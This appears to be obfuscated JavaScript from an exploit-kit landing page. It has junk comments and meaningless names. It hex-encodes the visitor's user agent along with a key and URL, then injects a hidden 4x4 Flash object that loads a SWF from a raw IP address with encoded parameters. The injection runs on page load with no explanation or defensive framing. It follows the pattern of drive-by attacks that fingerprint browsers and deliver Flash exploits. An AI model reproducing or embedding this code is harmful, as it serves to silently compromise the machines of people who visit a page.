/*s60033d54108hssfj79828fs*/function hgfgerdfgdf(num, width){/*s79416d20415hfj93262fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s79459d22644hfj68408fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s86272d99759hfj92248fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s87759d75455hfj98668fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd5462hfs*/c += b + d;/*s47557d17477hfj5259fs*/e += 1;}return c;}/*s73809dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.165/?NTkwNzQ3NDA=&ma=TnjEfVfQdgnopcWwlG9qqqikDVyRSe1pWL_EfeMAsTqcSXErc82lX9mbMkcs0mwx6E6FETi-hL&pa=xXzQMvWebRXQC53EKvncT6NEMVHRHECL2YydmrHTefjaelWkzrLFTF_yozKASwSG6_JtdfJSDQ&gift=MzY0MDI2ODU=", ghnvbn("http://188.225.33.165/?ODU1MjE2NDg=&pa=xHzQMrPYbR3FFYPfKPnEUKdEMU7WA0eKwYyZhazVF5-xFDTGpbH1FxzspVydCF-EmvJvdLAHIwGh1UTASwd&ma=mmoxfB1sV9qusikPcmhfJg5aG-RSNYQtHqZCXHbNpi1-kmbBCJsohwReF4WBYmustU1gX5gsRnaz7S6CJrg&shop=ODYwNTg1Nw==","wexykukusw"));